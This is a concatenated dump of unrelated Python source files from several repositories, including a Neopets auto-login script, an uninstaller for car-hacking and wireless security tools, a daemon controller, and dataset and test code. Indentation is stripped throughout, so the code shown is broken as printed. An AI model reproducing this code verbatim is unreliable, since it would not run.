dw_df = pd.read_csv("dw_df.csv") # read in data from file 'dw_df.csv' on the current working directory
dw_df = dw_df.drop(['Unnamed: 0'], axis = 1) # drop the index column created by the writing to a csv
# when stored and read, datetime gets converted to an object, so put back into datetime format
dw_df['creationDate'] = pd.to_datetime(dw_df['creationDate'])
# round creation date down to the nearest minute to make graphs more readable
dw_df['creationDate'] = [roundMin(dw_df['creationDate'][i]) for i in range( len(dw_df) )]
# ##################
# Analyze
# ##################
study3_df = dw_df[dw_df.studyID == 3] # create a new dataframe with only survey 3 data
plt.hist(study3_df['response'], range(1, 8)) # plot the responses in a histogram
plt.title('Responses Over All Factors') # title the histogram
plt.show() # display the histogram
for fact in set(study3_df['factorName']): # loop through the factors present
# create a new dataframe to work with that stores creationDate along with average response
# average responses are grouped by minutes since we rounded to the nearest minute earlier
curr_df = study3_df[study3_df.factorName == fact].groupby(['creationDate'], as_index = False).agg({'response':'mean'})
plt.plot(curr_df['creationDate'], curr_df['response'] ) # plot the average responses by creationDate
plt.title(fact) # title the graph with the current factor
plt.show() # display plot
``` |
{
"source": "joshehlinger/bandoleers",
"score": 2
} |
#### File: joshehlinger/bandoleers/setup.py
```python
import os.path
import setuptools
import bandoleers
def read_requirements(name):
requirements = []
try:
with open(os.path.join('requires', name)) as req_file:
for line in req_file:
if '#' in line:
line = line[:line.index('#')]
line = line.strip()
if line.startswith('-r'):
requirements.extend(read_requirements(line[2:].strip()))
elif line and not line.startswith('-'):
requirements.append(line)
except IOError:
pass
return requirements
setuptools.setup(
name='bandoleers',
description='AWeber development tool belt',
long_description='\n'+open('README.rst').read(),
version=bandoleers.__version__,
packages=setuptools.find_packages(exclude=['tests', 'tests.*']),
license='BSD',
url='https://github.com/aweber/bandoleers',
author='<NAME> <EMAIL>, <EMAIL>.',
author_email='<EMAIL>',
install_requires=read_requirements('installation.txt'),
tests_require=read_requirements('testing.txt'),
entry_points={
'console_scripts': [
'prep-it=bandoleers.prepit:run',
'wait-for=bandoleers.waitfor:run',
],
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
``` |
{
"source": "joshehlinger/helper",
"score": 3
} |
#### File: helper/helper/controller.py
```python
import logging
import logging.config
import os
import multiprocessing
import platform
try:
import queue
except ImportError:
import Queue as queue
import signal
import sys
import time
from helper import config, __version__
LOGGER = logging.getLogger(__name__)
class Controller(object):
"""Extend this class to implement your core application controller. Key
methods to implement are Controller.setup, Controller.process and
Controller.cleanup.
If you do not want to use the sleep/wake structure but rather something
like a blocking IOLoop, overwrite the Controller.run method.
"""
APPNAME = sys.argv[0].split(os.sep)[-1]
VERSION = __version__
#: When shutting down, how long should sleeping block the interpreter while
#: waiting for the state to indicate the class is no longer active.
SLEEP_UNIT = 0.5
#: How often should :meth:`Controller.process` be invoked
WAKE_INTERVAL = 60
#: Initializing state is only set during initial object creation
STATE_INITIALIZING = 0x01
#: When helper has set the signal timer and is paused, it will be in the
#: sleeping state.
STATE_SLEEPING = 0x02
#: The idle state is available to implementing classes to indicate that
#: while they are not actively performing tasks, they are not sleeping.
#: Objects in the idle state can be shutdown immediately.
STATE_IDLE = 0x03
#: The active state should be set whenever the implementing class is
#: performing a task that can not be interrupted.
STATE_ACTIVE = 0x04
#: The stop requested state is set when a signal is received indicating the
#: process should stop. The app will invoke the :meth:`Controller.stop`
#: method which will wait for the process state to change from STATE_ACTIVE
STATE_STOP_REQUESTED = 0x05
#: Once the application has started to shutdown, it will set the state to
#: stopping and then invoke the :meth:`Controller.stopping` method.
STATE_STOPPING = 0x06
#: Once the application has fully stopped, the state is set to stopped.
STATE_STOPPED = 0x07
# For reverse lookup
_STATES = {0x00: 'None',
0x01: 'Initializing',
0x02: 'Sleeping',
0x03: 'Idle',
0x04: 'Active',
0x05: 'Stop Requested',
0x06: 'Stopping',
0x07: 'Stopped'}
# Default state
_state = 0x00
def __init__(self, args, operating_system):
"""Create an instance of the controller passing in the debug flag,
the options and arguments from the cli parser.
:param argparse.Namespace args: Command line arguments
:param str operating_system: Operating system name from helper.platform
"""
self.set_state(self.STATE_INITIALIZING)
self.args = args
try:
self.config = config.Config(args.config)
except ValueError:
sys.exit(1)
self.debug = args.foreground
logging.config.dictConfig(self.config.logging)
self.operating_system = operating_system
self.pending_signals = multiprocessing.Queue()
@property
def current_state(self):
"""Property method that return the string description of the runtime
state.
:rtype: str
"""
return self._STATES[self._state]
@property
def is_active(self):
"""Property method that returns a bool specifying if the process is
currently active.
:rtype: bool
"""
return self._state == self.STATE_ACTIVE
@property
def is_idle(self):
"""Property method that returns a bool specifying if the process is
currently idle.
:rtype: bool
"""
return self._state == self.STATE_IDLE
@property
def is_initializing(self):
"""Property method that returns a bool specifying if the process is
currently initializing.
:rtype: bool
"""
return self._state == self.STATE_INITIALIZING
@property
def is_running(self):
"""Property method that returns a bool specifying if the process is
currently running. This will return true if the state is active, idle
or initializing.
:rtype: bool
"""
return self._state in [self.STATE_ACTIVE,
self.STATE_IDLE,
self.STATE_INITIALIZING]
@property
def is_sleeping(self):
"""Property method that returns a bool specifying if the process is
currently sleeping.
:rtype: bool
"""
return self._state == self.STATE_SLEEPING
@property
def is_stopped(self):
"""Property method that returns a bool specifying if the process is
stopped.
:rtype: bool
"""
return self._state == self.STATE_STOPPED
@property
def is_stopping(self):
"""Property method that returns a bool specifying if the process is
stopping.
:rtype: bool
"""
return self._state == self.STATE_STOPPING
@property
def is_waiting_to_stop(self):
"""Property method that returns a bool specifying if the process is
waiting for the current process to finish so it can stop.
:rtype: bool
"""
return self._state == self.STATE_STOP_REQUESTED
def on_configuration_reloaded(self):
"""Override to provide any steps when the configuration is reloaded."""
LOGGER.debug('%s.on_configuration_reloaded() NotImplemented',
self.__class__.__name__)
def on_shutdown(self):
"""Override this method to cleanly shutdown the application."""
LOGGER.debug('%s.cleanup() NotImplemented', self.__class__.__name__)
def on_sigusr1(self):
"""Called when SIGUSR1 is received, does not have any attached
behavior. Override to implement a behavior for this signal.
"""
LOGGER.debug('%s.on_sigusr1() NotImplemented', self.__class__.__name__)
def on_sigusr2(self):
"""Called when SIGUSR2 is received, does not have any attached
behavior. Override to implement a behavior for this signal.
"""
LOGGER.debug('%s.on_sigusr2() NotImplemented', self.__class__.__name__)
def process(self):
"""To be implemented by the extending class. Is called after every
sleep interval in the main application loop.
"""
raise NotImplementedError
def process_signal(self, signum):
"""Invoked whenever a signal is added to the stack.
:param int signum: The signal that was added
"""
if signum == signal.SIGTERM:
LOGGER.info('Received SIGTERM, initiating shutdown')
self.stop()
elif signum == signal.SIGHUP:
LOGGER.info('Received SIGHUP')
if self.config.reload():
LOGGER.info('Configuration reloaded')
logging.config.dictConfig(self.config.logging)
self.on_configuration_reloaded()
elif signum == signal.SIGUSR1:
self.on_sigusr1()
elif signum == signal.SIGUSR2:
self.on_sigusr2()
def run(self):
"""The core method for starting the application. Will setup logging,
toggle the runtime state flag, block on loop, then call shutdown.
Redefine this method if you intend to use an IO Loop or some other
long running process.
"""
LOGGER.info('%s v%s started', self.APPNAME, self.VERSION)
self.setup()
while not any([self.is_stopping, self.is_stopped]):
self.set_state(self.STATE_SLEEPING)
try:
signum = self.pending_signals.get(True, self.wake_interval)
except queue.Empty:
pass
else:
self.process_signal(signum)
if any([self.is_stopping, self.is_stopped]):
break
self.set_state(self.STATE_ACTIVE)
self.process()
def start(self):
"""Important:
Do not extend this method, rather redefine Controller.run
"""
for signum in [signal.SIGHUP, signal.SIGTERM,
signal.SIGUSR1, signal.SIGUSR2]:
signal.signal(signum, self._on_signal)
self.run()
def set_state(self, state):
"""Set the runtime state of the Controller. Use the internal constants
to ensure proper state values:
- :attr:`Controller.STATE_INITIALIZING`
- :attr:`Controller.STATE_ACTIVE`
- :attr:`Controller.STATE_IDLE`
- :attr:`Controller.STATE_SLEEPING`
- :attr:`Controller.STATE_STOP_REQUESTED`
- :attr:`Controller.STATE_STOPPING`
- :attr:`Controller.STATE_STOPPED`
:param int state: The runtime state
:raises: ValueError
"""
if state == self._state:
return
elif state not in self._STATES.keys():
raise ValueError('Invalid state {}'.format(state))
# Check for invalid transitions
if self.is_waiting_to_stop and state not in [self.STATE_STOPPING,
self.STATE_STOPPED]:
LOGGER.warning('Attempt to set invalid state while waiting to '
'shutdown: %s ', self._STATES[state])
return
elif self.is_stopping and state != self.STATE_STOPPED:
LOGGER.warning('Attempt to set invalid post shutdown state: %s',
self._STATES[state])
return
elif self.is_running and state not in [self.STATE_ACTIVE,
self.STATE_IDLE,
self.STATE_SLEEPING,
self.STATE_STOP_REQUESTED,
self.STATE_STOPPING]:
LOGGER.warning('Attempt to set invalid post running state: %s',
self._STATES[state])
return
elif self.is_sleeping and state not in [self.STATE_ACTIVE,
self.STATE_IDLE,
self.STATE_STOP_REQUESTED,
self.STATE_STOPPING]:
LOGGER.warning('Attempt to set invalid post sleeping state: %s',
self._STATES[state])
return
LOGGER.debug('State changed from %s to %s',
self._STATES[self._state], self._STATES[state])
self._state = state
def setup(self):
"""Override to provide any required setup steps."""
LOGGER.debug('%s.setup() NotImplemented', self.__class__.__name__)
def shutdown(self):
"""Override to provide any required shutdown steps."""
LOGGER.debug('%s.shutdown() NotImplemented', self.__class__.__name__)
def stop(self):
"""Override to implement shutdown steps."""
LOGGER.info('Attempting to stop the process')
self.set_state(self.STATE_STOP_REQUESTED)
# Call shutdown for classes to add shutdown steps
self.shutdown()
# Wait for the current run to finish
while self.is_running and self.is_waiting_to_stop:
LOGGER.info('Waiting for the process to finish')
time.sleep(self.SLEEP_UNIT)
# Change the state to shutting down
if not self.is_stopping:
self.set_state(self.STATE_STOPPING)
# Call a method that may be overwritten to cleanly shutdown
self.on_shutdown()
# Change our state
self.set_state(self.STATE_STOPPED)
@property
def system_platform(self):
"""Return a tuple containing the operating system, python
implementation (CPython, pypy, etc), and python version.
:rtype: tuple(str, str, str)
"""
return (self.operating_system,
platform.python_implementation(),
platform.python_version())
@property
def wake_interval(self):
"""Property method that returns the wake interval in seconds.
:rtype: int
"""
return (self.config.application.get('wake_interval') or
self.WAKE_INTERVAL)
def _on_signal(self, signum, _frame):
"""Append the signal to the queue, to be processed by the main."""
self.pending_signals.put(signum)
```
#### File: helper/tests/config_tests.py
```python
import json
import os
import unittest
import uuid
import boto3
from helper import config
class ConfigDefaultTests(unittest.TestCase):
def setUp(self):
self.config = config.Config()
def test_application(self):
self.assertDictEqual(self.config.application, config.APPLICATION)
def test_daemon(self):
self.assertDictEqual(self.config.daemon, config.DAEMON)
def test_logging(self):
self.assertDictEqual(self.config.logging, config.LOGGING)
class RemoteConfigTests(unittest.TestCase):
def setUp(self):
self.value = {
'Application': {
'key': str(uuid.uuid4())
},
'Daemon': {
'user': str(uuid.uuid4()),
'group': str(uuid.uuid4())
},
'Logging': {
'disable_existing_loggers': False,
'incremental': True}
}
self.bucket = str(uuid.uuid4())
client = boto3.client('s3', endpoint_url=os.environ['S3_ENDPOINT'])
client.create_bucket(Bucket=self.bucket)
client.put_object(
Bucket=self.bucket, Key='test.json',
Body=json.dumps(self.value),
ACL='public-read')
def test_loaded_config(self):
cfg = config.Config('{}/{}/test.json'.format(
os.environ['S3_ENDPOINT'], self.bucket))
for key in self.value['Application'].keys():
self.assertEqual(cfg.application[key],
self.value['Application'][key])
for key in self.value['Daemon'].keys():
self.assertEqual(cfg.daemon[key],
self.value['Daemon'][key])
for key in self.value['Logging'].keys():
self.assertEqual(cfg.logging[key],
self.value['Logging'][key])
def test_value_error_raised_for_missing_file(self):
with self.assertRaises(ValueError):
config.Config('{}/{}/{}.json'.format(os.environ['S3_ENDPOINT'],
self.bucket, uuid.uuid4()))
class S3ConfigTests(RemoteConfigTests):
def test_loaded_config(self):
cfg = config.Config('s3://{}/test.json'.format(self.bucket))
for key in self.value['Application'].keys():
self.assertEqual(cfg.application[key],
self.value['Application'][key])
for key in self.value['Daemon'].keys():
self.assertEqual(cfg.daemon[key],
self.value['Daemon'][key])
for key in self.value['Logging'].keys():
self.assertEqual(cfg.logging[key],
self.value['Logging'][key])
def test_value_error_raised_for_missing_file(self):
with self.assertRaises(ValueError):
config.Config('s3://{}/{}.json'.format(self.bucket, uuid.uuid4()))
``` |
{
"source": "joshehlinger/neobanker",
"score": 3
} |
#### File: joshehlinger/neobanker/banker.py
```python
import time
import sys
import argparse
import datetime
from selenium import webdriver
def collect_interest(config):
options = webdriver.ChromeOptions()
options.add_argument('headless')
driver = webdriver.Chrome(options=options)
try:
print ('Run starting at {}'.format(str(datetime.datetime.now())))
driver.get('http://www.neopets.com/bank.phtml')
# Login
print('Logging in...')
login_form = driver.find_element_by_class_name('welcomeLoginContent')
username_login = login_form.find_element_by_name('username')
password_login = login_form.find_element_by_name('password')
username_login.clear()
username_login.send_keys(config.username)
password_login.clear()
password_login.send_keys(config.password)
login_button = driver.find_element_by_class_name('welcomeLoginButton')
login_button.click()
print('Login successful')
# Collect interest
interest_button = driver.find_element_by_css_selector("input[value^='Collect Interest']")
driver.execute_script("arguments[0].scrollIntoView();", interest_button)
interest_button.click()
print('Collected Interest!')
time.sleep(1)
driver.quit()
return 0
except Exception as e:
print(e)
driver.quit()
return 1
def arg_parser() -> argparse.ArgumentParser:
desc = 'Collect that interest'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('--username',
dest='username',
metavar='',
help='username')
parser.add_argument('--password',
dest='password',
metavar='',
help='password')
return parser
def main(args=None):
parser = arg_parser()
config = parser.parse_args(args=args)
if config.username is None or config.password is None:
print('Username and Password are required!')
return 1
return collect_interest(config)
if __name__ == '__main__':
sys.exit(main())
``` |
{
"source": "joshem/Autopen2",
"score": 3
} |
#### File: old/testkivy/main.py
```python
import kivy
kivy.require('1.9.0')
from cheesepoofs.kerplunk import script
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.lang import Builder
from kivy.animation import Animation
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
from kivy.uix.textinput import TextInput
from kivy.graphics import Color, Rectangle
Builder.load_string('''
<Marvel>
Label:
id: loki
text: 'loki: I AM YOUR GOD!'
Button:
id: hulk
text: "press to smash loki"
on_release: root.hulk_smash()
''')
class Marvel(BoxLayout):
def hulk_smash(self):
self.ids.hulk.text = "hulk: puny god!"
self.ids["loki"].text = "loki: >_<!!!" # alternative syntax
script.install_script()
class AutoPen(App):
def build(self):
#with open("tips.txt", "r") as stream:
# labeltext = stream.read()
label = Label(text="[size=50]hi[/size]", markup=True)
box = BoxLayout()
marvell = Marvel()
box.add_widget(marvell)
box.add_widget(label)
return box
class Anima(App):
def build(self):
floater = FloatLayout()
self.widget = Button(text='herpderp', pos = (200,200), size_hint=(0.2,0.2))
self.backbutton = Button(text='back', pos=(0,0), size_hint =(0.1,0.2))
self.widget.bind(on_press=self.animate)
self.backbutton.bind(on_press=self.back)
floater.add_widget(self.widget)
floater.add_widget(self.backbutton)
return floater
def animate(self, widgetself):
anim = Animation(x=100, y=100)
anim.start(self.widget)
def back(self,widgetself):
anim = Animation(x=200,y=200)
anim.start(self.widget)
class Loading(App):
def build(self):
floater = FloatLayout()
logo = Image(source='AutoPen.png', pos_hint={'center_x': 0.5, 'center_y': .6})
spiderman = Label(
text='[size=24][i]With Great Power comes Great Responsibility[/i][/size]',
markup=True,
pos_hint={'center_x': 0.5, 'center_y': .2})
enter = Button(text='enter', size_hint=(0.2,0.1), pos_hint={'center_x': 0.5, 'center_y': .1})
floater.add_widget(logo)
floater.add_widget(spiderman)
floater.add_widget(enter)
return floater
class Textboox(App):
def build(self):
floater = FloatLayout()
if __name__ == "__main__":
Loading().run()
```
#### File: joshem/Autopen2/uninstall.py
```python
import general_use
import dependencies
import tools
import subprocess
import os
def uninstall(toolname):
repo_canbus_utils = 'https://github.com/digitalbond/canbus-utils.git'
repo_kayak = 'https://github.com/dschanoeh/Kayak.git'
repo_caringcaribou = 'https://github.com/CaringCaribou/caringcaribou.git' #want to check this to make sure it works, instructions a bit unclear
repo_c0f = 'https://github.com/zombieCraig/c0f.git'
repo_udsim = 'https://github.com/zombieCraig/UDSim.git'
repo_j1939 = 'https://github.com/wang701/can-utils-j1939.git'
repo_canbadger = 'https://github.com/Gutenshit/CANBadger.git'
repo_canbadger_server = 'https://github.com/Gutenshit/CANBadger-Server.git'
repo_katoolin = 'https://github.com/LionSec/katoolin.git'
repo_bluelog = 'https://github.com/MS3FGX/Bluelog.git'
repo_bluemaho = 'https://github.com/zenware/bluemaho.git'
link_pyobd = 'http://www.obdtester.com/download/pyobd_0.9.3.tar.gz' #this might not work
link_o2oo = 'https://www.vanheusden.com/O2OO/O2OO-0.9.tgz'
link_romraider = 'http://assembla.com/spaces/romraider/documents/a5Ao9gHEir5P9Udmr6QqzO/download/RomRaider0.5.9RC3-linux.jar'
d = general_use.check_distribution()
pack_man = general_use.package_tool(d)
rm_rc = -1
#check path to make sure it's in the autopen directory
curr = os.getcwd()
back_index = curr.rfind('/')
ap_index = curr.find('autopen')
if curr[back_index:] != '/autopen':
path = curr[:ap_index+7]
else:
path = curr
os.chdir(path)
try:
if toolname == 'canbus-utils':
rm_rc = subprocess.run(['rm', '-rf', 'canbus-utils']).returncode
elif toolname == 'Kayak':
rm_rc = subprocess.run(['rm', '-rf', 'Kayak']).returncode
elif toolname == 'caringcaribou':
rm_rc = subprocess.run(['rm', '-rf', 'caringcaribou']).returncode
elif toolname == 'c0f':
rm_rc = subprocess.run(['rm', '-rf', 'c0f']).returncode
elif toolname == 'udsim':
rm_rc = subprocess.run(['rm', '-rf', 'UDSim']).returncode
elif toolname == 'katoolin':
rm_rc = subprocess.run(['rm', '-rf', 'katoolin']).returncode
elif toolname == 'bluelog':
rm_rc = subprocess.run(['rm', '-rf', 'Bluelog']).returncode
elif toolname == 'bluemaho':
rm_rc = subprocess.run(['rm', '-rf', 'bluemaho']).returncode
elif toolname == 'j1939':
rm_rc = subprocess.run(['rm', '-rf', 'can-utils-j1939']).returncode
elif toolname == 'canbadger-hw':
rm_rc = subprocess.run(['rm', '-rf', 'CANBadger']).returncode
#https://github.com/Gutenshit/CANBadger/wiki/Getting-the-board-ready
elif toolname == 'canbadger-sw':
rm_rc = subprocess.run(['rm', '-rf', 'CANBadger-Server']).returncode
elif toolname == 'pyobd':
try:
rm_rc = subprocess.run(['rm', '-rf','pyobd_0.9.3.tar.gz']).returncode
except:
pass
try:
rm_rc = subprocess.run('rm', '-rf', 'pyobd-0.9.3').returncode
except:
pass
elif toolname == 'o2oo':
try:
rm_rc = subprocess.run(['rm', '-rf','O2OO-0.9.tgz']).returncode
except:
pass
try:
rm_rc = subprocess.run('rm', '-rf', 'O2OO-0.9').returncode
except:
pass
elif toolname == 'btscanner':
rm_rc = subprocess.run(['sudo', pack_man, 'purge', '-y','btscanner']).returncode
elif toolname == 'gnuradio':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'gnuradio']).returncode
elif toolname == 'aircrack-ng':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'aircrack-ng']).returncode
elif toolname == 'gqrx':
rm_rc = subprocess.run(['sudo', pack_man, 'purge', '-y','gqrx']).returncode
elif toolname == 'can-utils':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'can-utils']).returncode
elif toolname == 'wireshark':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'wireshark']).returncode
elif toolname == 'tshark':
rm_rc = subprocess.run(['sudo', pack_man, 'purge','-y', 'tshark']).returncode
except:
print ('Not in correct directory')
print ('current directory is: ', os.getcwd())
pass
if rm_rc == 0:
#remove the tool from the text file
f = open("installed.txt","r+")
d = f.readlines()
f.seek(0)
for i in d:
if i != toolname:
f.write(i)
f.truncate()
print ('UNINSTALL SUCCESSFUL: Successfully uninstalled', toolname)
return rm_rc
def test(name):
return 0
``` |
{
"source": "joshembree/ml-viz",
"score": 3
} |
#### File: joshembree/ml-viz/app.py
```python
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.graph_objs as go
import plotly.express as px
from plotly.subplots import make_subplots
import pandas as pd
import numpy as np
import example_figures as example
import roc_fig
figs = {
'ROC Curves': roc_fig.fig,
'Example Scatter': example.scatter,
'Example Histogram': example.histogram
}
app = dash.Dash()
#fig_names = ['scatter', 'histogram']
fig_names = list(figs.keys())
fig_dropdown = html.Div([
dcc.Dropdown(
id='fig_dropdown',
options=[{'label': x, 'value': x} for x in fig_names],
value=None
)])
fig_plot = html.Div(id='fig_plot')
app.layout = html.Div([fig_dropdown, fig_plot])
@app.callback(
dash.dependencies.Output('fig_plot', 'children'),
[dash.dependencies.Input('fig_dropdown', 'value')])
def update_output(fig_name):
return name_to_figure(fig_name)
def name_to_figure(fig_name):
figure = go.Figure()
for name in fig_names:
if fig_name == name:
figure = figs[name]
return dcc.Graph(figure=figure)
app.run_server(debug=True, use_reloader=False)
``` |
{
"source": "joshenders/git-stacktrace",
"score": 2
} |
#### File: git_stacktrace/tests/base.py
```python
import fixtures
import testtools
class TestCase(testtools.TestCase):
def setUp(self):
super(TestCase, self).setUp()
stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout))
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
```
#### File: git_stacktrace/tests/test_api.py
```python
import mock
from git_stacktrace.tests import base
from git_stacktrace import api
from git_stacktrace import git
class TestApi(base.TestCase):
@mock.patch('git_stacktrace.git.convert_since')
def test_convert_since(self, mocked_command):
expected = "HASH1..HASH2"
mocked_command.return_value = expected
self.assertEqual(expected, api.convert_since('1.day'))
@mock.patch('git_stacktrace.git.valid_range')
def test_valid_range(self, mocked_command):
expected = True
mocked_command.return_value = expected
self.assertEqual(expected, api.valid_range('hash1..hash2'))
expected = False
mocked_command.return_value = expected
self.assertEqual(expected, api.valid_range('hash1..hash2'))
def get_traceback(self, java=False):
if java:
with open('git_stacktrace/tests/examples/java1.trace') as f:
traceback = api.parse_trace(f.readlines())
else:
with open('git_stacktrace/tests/examples/python3.trace') as f:
traceback = api.parse_trace(f.readlines())
return traceback
def setup_mocks(self, mock_files, mock_files_touched):
mock_files_touched.return_value = {'hash2': [git.GitFile('common/utils/geo_utils.py', 'M')]}
mock_files.return_value = ['common/utils/geo_utils.py']
@mock.patch('git_stacktrace.git.pickaxe')
@mock.patch('git_stacktrace.git.files_touched')
@mock.patch('git_stacktrace.git.files')
@mock.patch('git_stacktrace.git.line_match')
def test_lookup_stacktrace_python(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe):
mock_files_touched.return_value = True
mock_line_match.return_value = False
traceback = self.get_traceback()
self.setup_mocks(mock_files, mock_files_touched)
self.assertEqual(0, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False).
get_sorted_results()[0]._line_numbers_matched)
self.assertEqual(3, mock_pickaxe.call_count)
@mock.patch('git_stacktrace.git.pickaxe')
@mock.patch('git_stacktrace.git.files_touched')
@mock.patch('git_stacktrace.git.files')
@mock.patch('git_stacktrace.git.line_match')
def test_lookup_stacktrace_java(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe):
mock_files_touched.return_value = True
mock_line_match.return_value = True
traceback = self.get_traceback(java=True)
mock_files.return_value = ['devdaily/src/main/java/com/devdaily/tests/ExceptionTest.java']
mock_files_touched.return_value = {
'hash2':
[git.GitFile('devdaily/src/main/java/com/devdaily/tests/ExceptionTest.java', 'M')]}
self.assertEqual(2, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False).
get_sorted_results()[0]._line_numbers_matched)
self.assertEqual(0, mock_pickaxe.call_count)
@mock.patch('git_stacktrace.git.pickaxe')
@mock.patch('git_stacktrace.git.files_touched')
@mock.patch('git_stacktrace.git.files')
@mock.patch('git_stacktrace.git.line_match')
def test_lookup_stacktrace_fast(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe):
mock_files_touched.return_value = True
traceback = self.get_traceback()
self.setup_mocks(mock_files, mock_files_touched)
api.lookup_stacktrace(traceback, "hash1..hash3", fast=True)
self.assertEqual(1, mock_pickaxe.call_count)
@mock.patch('git_stacktrace.git.pickaxe')
@mock.patch('git_stacktrace.git.files_touched')
@mock.patch('git_stacktrace.git.files')
@mock.patch('git_stacktrace.git.line_match')
def test_lookup_stacktrace_line_match(self, mock_line_match, mock_files, mock_files_touched, mock_pickaxe):
mock_files_touched.return_value = True
mock_line_match.return_value = True
traceback = self.get_traceback()
self.setup_mocks(mock_files, mock_files_touched)
self.assertEqual(1, api.lookup_stacktrace(traceback, "hash1..hash3", fast=False).
get_sorted_results()[0]._line_numbers_matched)
self.assertEqual(3, mock_pickaxe.call_count)
``` |
{
"source": "josherich/CSS2Code",
"score": 2
} |
#### File: CSS2Code/scripts/record.py
```python
from selenium import webdriver
import sys, getopt, time, subprocess, shlex
from xvfbwrapper import Xvfb
import argparse
effects = ['bounce','flash', 'pulse', 'rubberBand',
'shake', 'headShake', 'swing', 'tada',
'wobble','jello', 'bounceIn','bounceInDown',
'bounceInLeft','bounceInRight', 'bounceInUp','bounceOut',
'bounceOutDown', 'bounceOutLeft', 'bounceOutRight','bounceOutUp',
'fadeIn','fadeInDown','fadeInDownBig', 'fadeInLeft',
'fadeInLeftBig', 'fadeInRight', 'fadeInRightBig','fadeInUp',
'fadeInUpBig', 'fadeOut', 'fadeOutDown', 'fadeOutDownBig',
'fadeOutLeft', 'fadeOutLeftBig','fadeOutRight','fadeOutRightBig',
'fadeOutUp', 'fadeOutUpBig','flipInX', 'flipInY',
'flipOutX','flipOutY','lightSpeedIn','lightSpeedOut',
'rotateIn','rotateInDownLeft','rotateInDownRight', 'rotateInUpLeft',
'rotateInUpRight', 'rotateOut', 'rotateOutDownLeft', 'rotateOutDownRight',
'rotateOutUpLeft', 'rotateOutUpRight','hinge', 'jackInTheBox',
'rollIn','rollOut', 'zoomIn','zoomInDown',
'zoomInLeft','zoomInRight', 'zoomInUp','zoomOut',
'zoomOutDown', 'zoomOutLeft', 'zoomOutRight','zoomOutUp',
'slideInDown', 'slideInLeft', 'slideInRight','slideInUp',
'slideOutDown','slideOutLeft','slideOutRight', 'slideOutUp',
'heartBeat']
patterns = [
'text',
'square',
'line',
'image'
]
speeds = [
'slow',
'slower',
'fast',
'faster'
]
def record(xvfb, browser, effect, pattern, speed, html_path, video_path):
url = 'file://%s/%s_%s_%s.html' % (html_path, effect, pattern, speed)
destination = '%s/%s/%s_%s_%s.flv' % (video_path, effect, effect, pattern, speed)
browser.get(url)
# normal quality, lagging in the first part on the video. filesize ~7MB
# ffmpeg_stream = 'ffmpeg -f x11grab -s 1280x720 -r 24 -i :%d+nomouse -c:v libx264 -preset superfast -pix_fmt yuv420p -s 1280x720 -threads 0 -f flv "%s"' % (xvfb.new_display, destination)
# high quality, no lagging but huge. file size ~50MB
# ffmpeg_stream = 'ffmpeg -y -r 30 -f x11grab -s 256x256 -i :%d+nomouse -c:v libx264 -pix_fmt yuv420p video/bounce_text.mp4' % xvfb.new_display
# mkdir
mkdir_cmd = 'mkdir %s/%s' % (video_path, effect)
p = subprocess.Popen(shlex.split(mkdir_cmd))
# crop
ffmpeg_stream = 'ffmpeg -y -f x11grab -s 256x512 -r 24 -t 5 -i :%d+nomouse -filter:v "crop=256:256:0:128" -c:v libx264 -preset superfast -pix_fmt yuv420p -f flv "%s"' % (xvfb.new_display, destination)
args = shlex.split(ffmpeg_stream)
p = subprocess.Popen(args)
time.sleep(6) # record for 6 secs
def run(opt):
print('Sreencast webpage animation')
xvfb = Xvfb(width=256, height=512, colordepth=24)
xvfb.start()
browser = webdriver.Chrome()
for effect in effects:
for pattern in patterns:
for speed in speeds:
record(xvfb, browser, effect, pattern, speed, opt.html_path, opt.video_path)
browser.quit()
xvfb.stop()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
'--video-path',
default='./data/video',
type=str,
help='Root directory path of video generated')
parser.add_argument(
'--html-path',
default='./data/html',
type=str,
help='Root directory path of html generated')
args = parser.parse_args()
run(args)
``` |
{
"source": "joshes/ocp",
"score": 2
} |
#### File: ocpmodels/datasets/single_point_lmdb.py
```python
import os
import pickle
import lmdb
from torch.utils.data import Dataset
from ocpmodels.common.registry import registry
@registry.register_dataset("single_point_lmdb")
class SinglePointLmdbDataset(Dataset):
r"""Dataset class to load from LMDB files containing single point computations.
Useful for Initial Structure to Relaxed Energy (IS2RE) task.
Args:
config (dict): Dataset configuration
transform (callable, optional): Data transform function.
(default: :obj:`None`)
"""
def __init__(self, config, transform=None):
super(SinglePointLmdbDataset, self).__init__()
self.config = config
self.db_path = self.config["src"]
assert os.path.isfile(self.db_path), "{} not found".format(
self.db_path
)
env = self.connect_db(self.db_path)
self._keys = [
f"{j}".encode("ascii") for j in range(env.stat()["entries"])
]
self.transform = transform
env.close()
def __len__(self):
return len(self._keys)
def __getitem__(self, idx):
# Return features.
env = self.connect_db(self.db_path)
datapoint_pickled = env.begin().get(self._keys[idx])
data_object = pickle.loads(datapoint_pickled)
data_object = (
data_object
if self.transform is None
else self.transform(data_object)
)
env.close()
return data_object
def connect_db(self, lmdb_path=None):
env = lmdb.open(
lmdb_path,
subdir=False,
readonly=True,
lock=False,
readahead=False,
map_size=1099511627776 * 2,
)
return env
``` |
{
"source": "joshessman/assigner",
"score": 3
